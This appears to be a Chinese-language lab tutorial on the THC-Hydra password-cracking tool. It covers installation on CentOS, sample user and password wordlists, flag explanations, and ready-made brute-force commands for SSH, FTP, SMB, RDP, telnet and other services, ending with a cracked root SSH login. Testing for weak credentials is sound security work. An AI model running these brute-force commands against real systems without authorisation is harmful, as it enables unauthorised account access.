THC-HYDRA是一个支持多种网络服务的非常快速的网络登陆破解工具。这个工具是一个验证性质的工具,它被设计的主要目的是为研究人员和安全从业人员展示远程获取一个系统的认证权限是比较容易的


实验环境

centos6.8_x64

master  192.168.1.102

slave     192.168.1.104


实验安装

hydra-7.5-1.el6.x86_64


软件安装

yum install -y  openssl-devel pcre-devel ncpfs-devel postgresql-devel libssh-devel subversion-devel  hydra.x86_64


ps -ef | grep hydra

root      2330  2264  0 14:26 pts/0    00:00:00 grep hydra


vim /root/users.txt  破解用户库文件

less users.txt 

root

admin

administrator

test


vim  /root/password.txt  破解密码文件

less password.txt 

1

123

123.com

aabbcc

systemadmin


hydra  -R 继续从上一次进度接着破解。

          -S 采用SSL链接。
          -s PORT 可通过这个参数指定非默认端口。
          -l LOGIN 指定破解的用户,对特定用户破解。
          -L FILE 指定用户名字典。
          -p PASS 小写,指定密码破解,少用,一般是采用密码字典。
          -P FILE 大写,指定密码字典。
    
-e ns 可选选项,n:空密码试探,s:使用指定用户和密码试探。
        -C FILE 使用冒号分割格式,例如“登录名:密码”来代替-L/-P参数。-M FILE 指定目标列表文件一行一条。
        -o FILE 指定结果输出文件。
        -f 在使用-M参数以后,找到第一对登录名或者密码的时候中止破解。
        -t TASKS 同时运行的线程数,默认为16。
        -w TIME 设置最大超时的时间,单位秒,默认是30s。
        -v / -V 显示详细过程

破解ssh        hydra -L users.txt -P password.txt -t 1 -vV -e ns 192.168.1.104 ssh

破解ftp         hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV

                    hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV

破解https      hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https

破解teamspeak  hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak

破解cisco      hydra -P pass.txt 10.36.16.18 cisco

                   hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable

破解smb        hydra -l administrator -P pass.txt 10.36.16.18 smb

破解pop3       hydra -l muts -P pass.txt my.pop3.mail pop3

破解rdp        hydra ip rdp -l administrator -P pass.txt -V

破解http-proxy hydra -l admin -P pass.txt http-proxy://10.36.16.18

破解imap       hydra -L user.txt -p secret 10.36.16.18 imap PLAIN

          hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN

破解telnet     hydra ip telnet -l 用户 -P 密码字典 -t 32 -s 23 -e ns -f -V

          

hydra -L users.txt -P password.txt -t 1 -vV -e ns 192.168.1.104 ssh       192.168.1.104 slave用户名 密码

[22][ssh] host: 192.168.1.04   login: root   password: 1  密码破解成功